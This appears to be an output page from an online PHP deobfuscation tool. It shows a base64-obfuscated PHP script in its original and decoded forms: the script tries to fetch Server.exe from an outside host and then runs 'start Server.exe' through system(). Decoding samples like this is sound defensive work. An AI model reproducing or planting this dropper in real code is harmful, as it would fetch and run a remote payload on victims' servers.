Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php echo @file_put_contents(@base64_decode("U2VydmVyLmV4ZQ=="),base64_decode("aHR0cDo..

Decoded Output download

<?php 
 
echo @file_put_contents(@base64_decode("U2VydmVyLmV4ZQ=="),base64_decode("aHR0cDovL3d3dy53aG1tYXN0ZXIuY29tL1NlcnZlci5leGU=")); echo system(base64_decode('c3RhcnQgU2VydmVyLmV4ZQ==')); 
 
?>

Did this file decode correctly?

Original Code

<?php

echo @file_put_contents(@base64_decode("U2VydmVyLmV4ZQ=="),base64_decode("aHR0cDovL3d3dy53aG1tYXN0ZXIuY29tL1NlcnZlci5leGU=")); echo system(base64_decode('c3RhcnQgU2VydmVyLmV4ZQ=='));

?>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 49d3ee2721dedbbfd55e955e65cce2c5
Eval Count 1
Decode Time 106 ms